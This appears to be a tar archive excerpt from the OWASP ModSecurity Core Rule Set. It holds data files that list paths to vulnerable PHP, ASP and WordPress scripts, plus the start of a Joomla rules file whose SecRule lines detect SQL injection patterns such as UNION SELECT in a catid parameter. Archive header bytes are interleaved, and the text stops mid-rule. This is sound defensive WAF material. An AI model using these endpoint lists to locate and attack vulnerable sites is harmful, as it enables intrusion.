/admin/global.php /admin/loadplugin.php /admin/thumbnailformpost.inc.php /admin/upgrade_unattended.php /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php /administrator/components/com_joomlaxplorer/admin.joomlaxplorer.php /administrator/components/com_jwmmxtd/admin.jwmmxtd.php /administrator/components/com_universal/includes/config/config.html.php /administrator/components/com_xcloner-backupandrestore/cloner.cron.php /application/views/public/commentform.php /arch.php /archive.php /ardeaCore/lib/core/ardeaBlog.php /ardeaCore/lib/core/ardeaInit.php /ardeaCore/lib/core/mvc/ardeaMVC.php /artmedic_print.php /assets/plugins/mp3_id/mp3_id.php /authenticate/sessions.php /awcm/control/common.php /awcm/header.php /awcm/includes/window_top.php /baconmap/admin/updatelist.php /base/Archive.php /base/Comments.php /base/News.php /base/SendFriend.php /base_qry_common.php /base_stat_common.php /basicfogfactory.class.php /bazar/picturelib.php /berylium-classes.php /bin/qte_init.php /block.php /block_center_down.php /block_center_top.php /block_left.php /block_right.php /blocks/file/controller.php /blocks/headerfile.php /body_comm.inc.php /body_default.php /centre.php /ch_readalso.php /chat/dac.php /checkout.php /class.csv.php /class.phpmailer.php /class_yapbbcooker.php /classes/excel/class.writeexcel_workbook.inc.php /classes/excel/class.writeexcel_worksheet.inc.php /classes/flash_mp3_player.23/extras/external_feeds/getfeed.php /classes/flash_mp3_player/extras/external_feeds/getfeed.php /cms/modules/form.lib.php /cms_detect.php /collectivite.class.php /com_del.php /com_koesubmit/koesubmit.php /com_ongumatimesheet20/lib/onguma.class.php /com_rwcards/rwcards.advancedate.php /com_swmenupro/ImageManager/Classes/ImageManager.php /com_xmovie/helpers/img.php /comments.php /common.php /common/errormsg.php /common/func.php /components/com_ajaxchat/tests/ajcuser.php /components/com_banners/banners.class.php /components/com_ezine/class/php/d4m_ajax_pagenav.php /components/com_intuit/models/intuit.php /components/com_jcalpro/cal_popup.php /components/com_mediaslide/viewer.php /components/com_mgm/help.mgm.php /components/com_mojo/wp-comments-post.php /components/com_mojo/wp-trackback.php /components/com_moofaq/includes/file_includer.php /components/com_morfeoshow/morfeoshow.html.php /components/com_smartformer/smartformer.php /components/com_smf/smf.php /components/com_xgallery/helpers/img.php /config.dadamail.php /config.php /container.php /content/dynpage_load.php /content/themes/softsaurus_default/pages/subHeader.php /content/themes/softsaurus_stretched/pages/subHeader.php /core/includes/gfw_smarty.php /courrier.class.php /cron.php /cuenta/cuerpo.php /cultbooking.php /customer_ftp.php /datumscalc.php /debugger.php /debugger/debug_php.php /define.php /detail.php /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php /display.php /dm-albums/template/album.php /doku.php /dompdf.php /don3_requiem.php /dosearch.php /download.php /downloads.php /dp_logs.php /e-pay/src/a_affil.php /e107_handlers/secure_img_handler.php /e107_plugins/trackback/trackbackClass.php /editor/edit_htmlarea.php /editors/FCKeditor/editor_registry.php /editors/dhtmltextarea/editor_registry.php /editors/tinymce/editor_registry.php /emailsender.php /embedforum.php /engine/api/api.class.php /example_clientside_javascript.php /examples/tbs_us_examples_0view.php /examples/widget8.php /export.php /export_batch.inc.php /extensions/saurus4/captcha_image.php /familynews.php /faq.php /filepool.php /files/blocks/latest_files.php /filters/headerfile.php /fonctions_racine.php /footer.inc.php /footer.php /forum.php /forums/blocks/latest_posts.php /frontpage.php /ftp.php /functionen/ref_kd_rubrik.php /functions.php /functions_install.php /gallery2/lib/adodb/adodb-error.inc.php /gbookmx/gbook.php /get_header.php /global.php /groups/headerfile.php /gunaysoft.php /handle/proxy.php /handlers/page/show.php /header.inc.php /header.php /heatmap/_main.php /heatmap/main.php /help.php /hg_referenz_jobgalerie.php /html.php /html2.php /iframe.php /inc/articles.inc.php /inc/content.inc.php /inc/logingecon.php /include/_bot.php /include/addons/version/pages/index.inc.php /include/admin.lib.inc.php /include/admin/device_admin.php /include/classes/file.class.php /include/engine/content/elements/menu.php /include/global.php /include/header.php /include/libs/internals/core.process_compiled_include.php /include/libs/internals/core.write_compiled_include.php /include/libs/plugins/function.config_load.php /include/logout.php /include/pages/specials.inc.php /include/payment/payflow_pro.php /include/prodler.class.php /include/timesheet.php /include/top_graph_header.php /include/unverified.inc.php /includes/Cache/Lite/Output.php /includes/ajax_listado.php /includes/classes/pctemplate.php /includes/common.php /includes/competitions/add.php /includes/competitions/competitions.php /includes/converter.inc.php /includes/esqueletos/skel_null.php /includes/file_manager/special.php /includes/footer.php /includes/function_core.php /includes/header.inc.php /includes/header.php /includes/hnmain.inc.php3 /includes/include.php /includes/includes.php /includes/init.php /includes/initsystem.php /includes/language.php /includes/messages.inc.php /includes/settings.inc.php /includes/settings/settings.php /includes/startmodules.inc.php /includes/workspace.php /index.php /index_inc.php /index_logged.php /infusions/last_seen_users_panel/last_seen_users_panel.php /init.php /install.clickheat.php /install/di.php /js/wptable-button.php /js/wptable-tinymce.php /language/1/splash.lang.php /last_gallery.php /latestposts.php /layout_admin_cfg.php /layout_cfg.php /layouts/standard.php /left_menu.php /lib.module.php /lib/FSphp.php /lib/action/rss.php /lib/addressbook.php /lib/function.php /lib/layout/layoutHeaderFuncs.php /lib/layout/layoutManager.php /lib/layout/layoutParser.php /lib/lcUser.php /lib/navigation.php /lib/page/pageDescriptionObject.php /lib/pathwirte.php /lib/smarty/SmartyFU.class.php /libraries/database.php /libraries/lib-remotehost.inc.php /library/setup/rpc.php /libs/db.php /libs/ftp.php /libs/lom.php /libsecure.php /linkadmin.php /links/blocks/links.php /load_lang.php /locales.php /locms/smarty.php /login.php /login.tpl.php /logout.php /lom_update.php /ltdialogo.php /main.inc.php /main/forum/komentar.php /main_prepend.php /maincore.php /membres/membreManager.php /menu/headerfile.php /message_class.php /mini.php /mod/image/index.php /mod/liens/index.php /mod/liste/index.php /mod/special/index.php /mod/texte/index.php /mod/vm/controller/AccessController.php /mod/vm/model/dao.php /mods/ckeditor/filemanager/connectors/php/connector.php /module.php /module/referenz.php /modules/3rdparty/adminpart/add3rdparty.php /modules/admin/include/config.php /modules/articles/adminpart/addarticles.php /modules/brandnews/adminpart/addbrandnews.php /modules/comments.php /modules/contact/adminpart/addcontact.php /modules/core/logger/init.php /modules/core/security/init.php /modules/dfss/lgsl/lgsl_players.php /modules/dfss/lgsl/lgsl_settings.php /modules/formmailer/formmailer.admin.inc.php /modules/game/adminpart/addgame.php /modules/guestbook/blocks/control.block.php /modules/login.php /modules/maticmarket/bleu/blanc/bas.php /modules/maticmarket/bleu/blanc/haut.php /modules/maticmarket/bleu/default/bas.php /modules/maticmarket/bleu/default/haut.php /modules/maticmarket/bleu/gold/bas.php /modules/maticmarket/bleu/gold/haut.php /modules/maticmarket/deco/blanc/bas.php /modules/maticmarket/deco/blanc/haut.php /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php /modules/newsletter/adminpart/addnewsletter.php /modules/noevents/templates/mfa_theme.php /modules/plain/adminpart/addplain.php /modules/polling/adminpart/addpolling.php /modules/product/adminpart/addproduct.php /modules/profile/user.php /modules/tour/adminpart/addtour.php /modules/users/headerfile.php /monatsblatt.php /mtdialogo.php /mw_plugin.php /nettools.popup.php /news.php /news/blocks/latest_news.php /news/search.php3 /news_show.php /newscat.php /nucleus/libs/PLUGINADMIN.php /nucleus/media.php /nucleus/xmlrpc/server.php /obj/action.class.php /obj/architecte.class.php /obj/avis.class.php /obj/bible.class.php /obj/blocnote.class.php /oldnews_reader.php /op/op.Login.php /overview/main.php /passwiki.php /pcltar.lib.php /pcltrace.lib.php /pear.php /pingsvr.php /plugin/HP_DEV/cms2.php /plugin/gateway/gnokii/init.php /plugin/themes/default/init.php /plugin_admin.php /plugins/PluginController.php /plugins/filemanager/get_file.php /plugins/templateie/lib/templateie_install.class.php /pmscript.php /portal_block.php /portfolio/css.php /prepend.php /preview.php /produkte_nach_serie.php /produkte_nach_serie_alle.php /profil.class.php /psg.smarty.lib.php /public/code/cp_html2xhtmlbasic.php /qlib/smarty.inc.php /qte_web.php /real_estate/index.php /ref_kd_rubrik.php /resource_categories_view.php /resources/includes/class.Smarty.php /rss_importer_functions.php /run_auto_suspend.cron.php /safehtml.php /scorm/lib.inc.php /scr/soustab.php /scripts/check-lom.php /scripts/weigh_keywords.php /search.php /section.php /send_email_cache.php /send_reminders.php /server_request.php /settings.php /settings/headerfile.php /show_joined.php /site_conf.php /sitemap.xml.php /skins/header.php /skins/phpchess/layout_t_top.php /slogin_lib.inc.php /smallaxe-0.3.1/inc/linkbar.php /snippet.reflect.php /spaw_control.class.php /stage1.php /stage4.php /stage6.php /standard/1/lay.php /standard/3/lay.php /startup.php /sublink.php /surfer_aendern.php /surfer_anmeldung_NWL.php /system/pageTemplate.php /system/utilities.php /templater.php /templates/default/tpl_message.php /templates/layout_lyrics.php /test/pages/contact.php /theme/format.php /threadstop/threadstop.php /tiki-jsplugin.php /tmsp/add_tmsp.php /tmsp/edit_tmsp.php /tmsp/subscription.php /tmsp/tmsp.php /toolbar.php /tools/filemanager/skins/mobile/admin1.template.php /update_trailer.php /urheber.php /user/turbulence.php /utdb_access.php /utgn_message.php /util/barcode.php /utilisateur.class.php /vars.inc.php /velid3/getid3.php /velid3/module.archive.gzip.php /view_blog_archives.php /view_blog_comments.php /view_messages.php /views/print/printbar.php /viewsource.php /viewver.php /watermark.php /web/lom.php /website.php /windetail.php /window_down.php /window_top.php /wordtube-button.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php /www/lib/head_auth.php admin.ponygallery.html.php app=urchin.cgi crea.php create_file.php droit.class.php functions_navlinks.php plugins/links/functions.inc plugins/polls/functions.inc plugins/spamx/BlackList.Examine.class.php plugins/spamx/DeleteComment.Action.class.php plugins/spamx/EditHeader.Admin.class.php plugins/spamx/EditIP.Admin.class.php plugins/spamx/EditIPofURL.Admin.class.php plugins/spamx/IPofUrl.Examine.class.php plugins/spamx/Import.Admin.class.php plugins/spamx/LogView.Admin.class.php plugins/spamx/MTBlackList.Examine.class.php plugins/spamx/MailAdmin.Action.class.php plugins/spamx/MassDelTrackback.Admin.class.php plugins/spamx/MassDelete.Admin.class.php plugins/staticpages/functions.inc profile_send.php viewtopic_PM-link.php����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_sqli.data������������������0000664�0000000�0000000�00000016320�12164572564�0030653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/ASPKAT.ASP /DocPay.w2b /G_Display.php /HABERLER.ASP /HaberDetay.asp /News/page.asp /OmegaMw7.asp /ProductDetails.asp /Search/DisplayResults.php /SecureLoginManager/list.asp /SelGruFra.asp /Types.asp /ViewBugs.php /ViewCat.php /ViewReport.php /WorkOrder.do /account_change.php /activeNews_categories.asp /activeNews_comments.asp /activenews_search.asp /activenews_view.asp /actualpic.asp /ad.asp /add2.php /add_comment.php /addrating.php /admin.asp /admin.php /admin/admin_acronyms.php /admin/admin_annonce/changeannonce.php /admin/admin_annonce/okvalannonce.php /admin/admin_mail_adressee.asp /admin/admin_membre/fiche_membre.php /admin/cms/opentree.php /admin/code/tce_xml_user_results.php /admin/config.php /admin/edit.asp /admin/memberlist.php /admin/modules/modules.php /admin_check_user.asp /admin_hacks_list.php /admincp.php /admincp/attachment.php /administration/administre2.php /administrator/components/com_sqlreport/ajax/print.php /albmgr.php /annonce_detail.php /applications/SecureLoginManager/inc_secureloginmanager.asp /aramayap.asp /archives.php /articles.asp /artreplydelete.asp /auth.php /badword.asp /banner.php /bb-includes/formatting-functions.php /bexfront.php /blocks/block-Old_Articles.php /boxx/ShowAppendix.asp /bry.asp /bt-trackback.php /bus_details.asp /calendar_detail.asp /cart.inc.php /cart.php /cat.asp /categoria.php /category.php /cats.asp /cchatbox.php /cgi-bin/reorder2.asp /check_vote.php /class/debug/debug_show.php /class/table_broken.php /classes/class.news.php /classes/class_session.php /classified_img.php /code/guestadd.php /com_comment.php /comersus_optReviewReadExec.asp /comment.php /comments.php /compareHomes.asp /compare_product.php /connexion.php /content.asp /content.php /content/rubric/index.php /country_escorts.php /coupon_detail.asp /dagent/downloadreport.asp /database/table/user.php /db_ecard.php /default.asp /default2.asp /detail.asp /detail.php /details.asp /dettaglio.asp /devami.asp /diary.php /dirSub.asp /dircat.asp /directions.php /directory.php /dispimage.asp /displayCalendar.asp /display_review.php /displaypic.asp /dl.php /dlwallpaper.php /down.asp /down_indir.asp /download_image.asp /dsp_page.cfm /duyuru.asp /eWebQuiz.asp /edit.asp /edit_day.php /email.php /error.asp /etkinlikbak.asp /example.php /faq.php /faqDsp.asp /filecheck.php /filelist.asp /filemgmt/singlefile.php /forgotpass.asp /forum.asp /forum.php /forum/include/error/autherror.cfm /forum/modules/gallery/post.php /forum/pop_up_member_search.asp /forum2.asp /forums.php /friend.php /functions.php /functions/functions_filters.asp /gallery.asp /gallery.php /game.php /game_listing.php /getnewsitem.php /giris.asp /giris_yap.asp /glossaire-p-f.php /gmail.php /goster.asp /guestbook.php /h_goster.asp /haber.asp /haberdetay.asp /haberoku.asp /hilfsmittel.php /home.php /homeDetail.asp /html/studentmain.php /i-search.php /imprimir.php /inc/class_users.php /inc/common.php /inc_listnews.asp /include.php /includes/a_register.asp /includes/mambo.php /includes/nsbypass.php /includes/rating.php /index.asp /index.cfm /index.php /index1.asp /info_book.asp /info_user.asp /informacion_general.php /infusions/mg_user_fotoalbum_panel/mg_user_fotoalbum.php /infusions/teams_structure/team.php /inlinemod.php /inout/status.asp /inout/update.asp /install.php /interna.php /item.asp /item.php /item_list.asp /item_show.asp /ixm_ixpnews.php /journal.php /jtfwcpnt.jsp /jump.php /kategori.asp /kernel/group.php /kullanicilistesi.asp /letterman.class.php /lib/entry_reply_entry.php /links.php /linkslist.asp /lire-avis.php /list.asp /list.php /list_comments.php /listfull.asp /listings.asp /listmain.asp /listmembers.php /listpics.asp /login.asp /login.php /login/register.asp /logon_user.php /low.php /mailer.w2b /main.asp /main/auth/my_progress.php /main_page.php /mainfile.php /manufacturer.php /meal_rest.asp /members.asp /mesajkutum.asp /mezungiris.asp /minbrowse.php /mod.php /mod_banners.php /model-kits.php /models/category.php /modules.php /modules/Advertising/admin/index.php /modules/News/index.php /modules/Surveys/modules.php /modules/admin/modules/gallery.php /modules/bms/invoices_discount_ajax.php /modules/comments/json.php /modules/mod_mainmenu/menu.php /moscomment.php /mystats.php /navigacija.php /news.asp /news.php /news_detail.asp /news_page.asp /newsdetail.asp /newsletters/edition.php /nickpage.php /notaevento.php /nukesentinel.php /ogretmenkontrol.asp /oku.asp /openPolicy.asp /open_tree.php /openlink.asp /orange.asp /order-track.php /ossim/repository/repository_attachment.php /outputs.php /page.asp /page.php /pages/addcomment2.php /pfs/pfs.edit.inc.php /philboard_forum.asp /phonemessage.asp /php-stats.recphp.php /plugins/authentication/ldap.php /plugins/campsiteattachment/attachments.php /plugins/ipsearch/ipsearch.admin.php /plugins/mp3playlist/mp3playlist.php /plugins/pdfClasses/pdfgen.php /plugins/search/categories.php /plugins/search/contacts.php /plugins/search/content.php /plugins/search/sections.php /plugins/search/weblinks.php /plugins/user/example.php /plus/feedback_js.php /pms.php /pollmentorres.asp /polls.php /pop_profile.asp /post.php /postingdetails.php /preferences.asp /prikazInformacije.php /print.asp /print.php /printarticle.asp /printmain.asp /printview.php /process.php /prodList.asp /product.asp /product_review.php /productdetail.asp /products.asp /products.php /program/moduler_banner_aabn.php /public/code/cp_downloads.php /public/code/cp_menu_data_file.php /publication_view.asp /publications_list.asp /qte_result.php /question.php /rating.asp /read/index.php /recipe.php /refund_request.php /register.php /repass.php /res_details.asp /result.asp /result.php /roleManager.jsp /rss.asp /rss/show_webfeed.php /samples/with_db/loaddetails.php /save.php /search.asp /search.php /search_listing.asp /searchkey.asp /searchmain.asp /searchoption.asp /section/default.asp /send_password_preferences.asp /sendarticle.asp /set_preferences.asp /shared/code/cp_authorization.php /shared/code/cp_functions_downloads.php /shopgiftregsearch.asp /show_joined.php /show_news.php /show_owned.php /showcats.php /showfile.asp /simplog/archive.php /simplog/index.php /site_info.php /slideshow.asp /sptrees/default.aspx /style.php /stylesheet.php /subcat.php /system/core/users/users.register.inc.php /system/index.php /takefreestart.php /tde_busca/processaPesquisa.php /templates/modif.html /thread.php /thumbnails.asp /thumbnails.php /topic_title.php /torrents.php /tracking/courseLog.php /types.asp /update_profile.php /urunbak.asp /user.asp /user.php /user_confirm.asp /user_pages/page.asp /userdetail.php /usergroups.php /usermgr.php /users.php /utilities/usermessages.asp /uye_giris_islem.asp /vBSupport.php /vdateUsr.asp /vehiclelistings.asp /verify.php /vf_memberdetail.asp /view.php /view_gallery.asp /view_profile.php /view_recent.asp /viewad.asp /viewcat.php /viewimage.php /viewlinks.asp /viewthread.php /virtuemart_parser.php /visu_user.asp /voirannonce.php /wallpaper.php /wbsearch.aspx /web/classes/autocomplete.php /windows.asp /wp-admin/admin-ajax.php /wp-admin/admin-functions.php /wp-content/plugins/1-flash-gallery/massedit_album.php /wp-content/plugins/cpl/cplphoto.php /wp-content/plugins/flash-album-gallery/lib/hitcounter.php /wp-content/plugins/forum-server/feed.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-trackback.php /xNews.php /xmlrpc.php graph_view.php tree.php����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_wordpress.data�������������0000664�0000000�0000000�00000003301�12164572564�0031726�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/books/getConfig.php /js/modalbox/tests/functional/_ajax_method_get.php /js/wptable-button.php /js/wptable-tinymce.php /plugins/accept-signups/accept-signups_submit.php /plugins/feedlist/handler_image.php /plugins/inline-gallery/browser/browser.php /plugins/socialgrid/static/js/inline-admin.js.php /rss/show_webfeed.php /sidebar.php /wordtube-button.php /wp-admin/admin-ajax.php /wp-admin/admin-functions.php /wp-admin/admin.php /wp-content/plugins/1-flash-gallery/folder.php /wp-content/plugins/1-flash-gallery/massedit_album.php /wp-content/plugins/audio/getid3/demos/demo.browse.php /wp-content/plugins/cpl/cplphoto.php /wp-content/plugins/firestats/php/window-add-excluded-ip.php /wp-content/plugins/firestats/php/window-add-excluded-url.php /wp-content/plugins/firestats/php/window-new-edit-site.php /wp-content/plugins/flash-album-gallery/lib/hitcounter.php /wp-content/plugins/forum-server/feed.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/lazyest-gallery/lazyest-popup.php /wp-content/plugins/nextgen-gallery/xml/media-rss.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php /wp-content/plugins/wp-cumulus/tagcloud.swf /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php /wp-content/plugins/xcloner-backup-and-restore/index2.php /wp-content/plugins/zotpress/zotpress.image.php /wp-login.php /wp-trackback.php /xmlrpc.php page=eshop-orders.php page=eshop-templates.php�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_xss.data�������������������0000664�0000000�0000000�00000011614�12164572564�0030521�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/Aris/wflogin.jsp /Default.aspx /English_manual_version_2.php /Forms/home_1 /ReadMsg.php /ReqWebHelp/advanced/workingSet.jsp /ReqWebHelp/basic/searchView.jsp /SearchCenter/Pages/AllResults.aspx /WebEditor/Authentication/LoginPage.aspx /WorkArea/reterror.aspx /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php /action_create/index.php /addons/kcfinder/browse.php /addressbook.cgi /admin/editListing.php /admin/queuedMessage.do /admin/rp-menu.php /admin/upgrade_unattended.php /administrator/components/com_xcloner-backupandrestore/index2.php /all_photos.html /annonce.php /appdev/sample/web/hello.jsp /archiva/admin/addLegacyArtifactPath!commit.action /archiva/admin/confirmDeleteRepository.action /archiva/admin/deleteNetworkProxy!confirm.action /archiva/deleteArtifact!doDelete.action /archiva/security/roleedit.action /archiva/security/useredit.action /archiva/security/userlist!show.action /awards.php /awstats/awstats.pl /basicstats.php /bizdir/bizdir.cgi /browseCat.php /browseSubCat.php /cacti/utilities.php /calendar.php /cand_login.asp /cat.php /catalogo.php /cgi/surgeftpmgr.cgi /config/edituser.php /configure_plugin.tpl.php /console.php /contact/index.php /core/themes.php /cultbooking.php /dailyview.php /de/create_account.asp /de/pda/dev_logon.asp /devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php /en/front_content.php /explanation.php /faces/jsf/tips.jsp /fetchmailprefs.php /footer.php /forcerestart.php /forcesd.php /frontend/x3/files/fileop.html /gnatsweb.pl /header.php /hlstats.php /html/11-login.asp /html/studentmain.php /implicit-objects.jsp /include/sessionRegister.php /index.php /js/modalbox/tests/functional/_ajax_method_get.php /jscripts/folder_rte_files/module_table.php /lib/jscalendar/test.php /lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php /listmembers.php /listmovies.php /loan.php /login.php /main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php /mods/ckeditor/filemanager/connectors/php/upload.php /module_bbcodeloader.php /module_div.php /module_email.php /module_image.php /module_link.php /modules.php /modules/boonex/custom_rss/post_mod_crss.php /modules/dl/download.php /news.asp /news.php /news/list/index.php /news/search.php3 /newsletter/create/index.php /openBrowser.php /openTutorial.php /order_form.php /patch/single_winner1.php /picture.php /plugins/accept-signups/accept-signups_submit.php /plugins/csstidy/css_optimiser.php /plugins/feedlist/handler_image.php /plugins/inline-gallery/browser/browser.php /plugins/photosmash-galleries/index.php /plugins/socialgrid/static/js/inline-admin.js.php /printcal.pl /private/blade_leds.php /private/cindefn.php /private/ipmi_bladestatus.php /private/pm_temp.php /private/power_management_policy_options.php /private/power_module.php /profiles/html/simpleSearch.do /rating/postcomments.php /rating/rate.php /register.php /reportItem.do /room/info_book.asp /room/week.asp /scripts/prodList.asp /search.5.html /search.php /search/list/action_search/index.php /sendcard.php /sendmail.php /sessions /settings.php /shared/code/cp_authorization.php /shared/config/cp_config.php /shipping/methods/fedex_v7/label_mgr/js_include.php /shipping/pages/popup_shipping/js_include.php /shopcontent.asp /showown.php /sidebar.php /siteminderagent/forms/smpwservices.fcc /skins/header.php /snarf_ajax.php /sqledit.php /stats.php /tagcloud-ru.swf /tagcloud.swf /templates/admin_default/confirm.tpl.php /templates/recruitment/jobVacancy.php /tiki-featured_link.php /topFrame.php /user/User_ChkLogin.asp /users/payment.php /usersettings.php /usrmgr/registerAccount.asp /vBTube.php /verify/asp/n6plugindestructor.asp /vtigerservice.php /we/include/weTracking/econda/weEcondaImplement.inc.php /we/include/we_modules/messaging/messaging_show_folder_content.php /we/include/we_modules/shop/edit_shop_editorFrameset.php /weapons.php /web/msgList/viewmsg/actions/msgAnalyse.asp /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp /web/msgList/viewmsg/viewHeaders.asp /web/phpinfo.php /workarea/medialist.aspx /wp-content/plugins/1-flash-gallery/folder.php /wp-content/plugins/audio/getid3/demos/demo.browse.php /wp-content/plugins/firestats/php/window-add-excluded-ip.php /wp-content/plugins/firestats/php/window-add-excluded-url.php /wp-content/plugins/firestats/php/window-new-edit-site.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-content/plugins/lazyest-gallery/lazyest-popup.php /wp-content/plugins/nextgen-gallery/xml/media-rss.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php /wp-content/plugins/wp-cumulus/tagcloud.swf /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php /wp-content/plugins/xcloner-backup-and-restore/index2.php /wp-content/plugins/zotpress/zotpress.image.php /wp-content/themes/redoable/header.php /wp-content/themes/redoable/searchloop.php /xperience.php /zimplit.php _invoice.asp page=eshop-orders.php page=eshop-templates.php stconf.nsf��������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_joomla_attacks.conf����0000664�0000000�0000000�00000731314�12164572564�0033570�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_joomla.data" "id:'2000000',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_JOOMLA_RULES" # (2005292) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid SELECT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005292,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005293) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005293,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005294) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005294,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005295) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid DELETE SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005295,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005296) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII SecRule REQUEST_LINE "@contains /models/category.php" 